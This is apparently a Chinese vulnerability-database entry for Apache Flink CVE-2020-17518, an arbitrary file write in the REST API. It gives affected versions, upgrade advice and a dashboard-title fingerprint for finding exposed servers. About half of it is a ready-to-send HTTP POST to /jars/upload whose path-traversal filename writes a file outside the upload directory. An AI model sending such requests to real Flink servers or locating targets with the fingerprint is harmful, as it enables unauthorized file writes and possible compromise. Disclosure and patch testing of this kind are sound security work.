漏洞名称
Apache Flink 任意文件写入(CVE-2020-17518)
CVE: CVE-2020-17518
DVB: DVB-2021-2269
漏洞信息
【涉及版本】:Flink1.5.1-1.11.2
【漏洞描述】:ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。\ 1.5.1版本中引入了REST API,该漏洞允许攻击者通过构造恶意的HTTP header,将上传的文件写入到本地文件系统上的任意位置。
【漏洞类型】:任意文件写入
资产搜索
title=”Apache Flink Web Dashboard”
修复建议
请用户将Flink升级到1.11.3或1.12.0
下载地址:https://flink.apache.org/downloads.html
POC
POST /jars/upload HTTP/1.1
Host: 192.168.18.169:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13247690941547071692111317477
Content-Length: 248
Origin: http://192.168.18.169:8081
Connection: close
Referer: http://192.168.18.169:8081/
-----------------------------13247690941547071692111317477
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/veraxy"
Content-Type: text/plain
Veraxy!!!
-----------------------------13247690941547071692111317477-
该POC来源互联网,如有侵权请联系删除
没有回复内容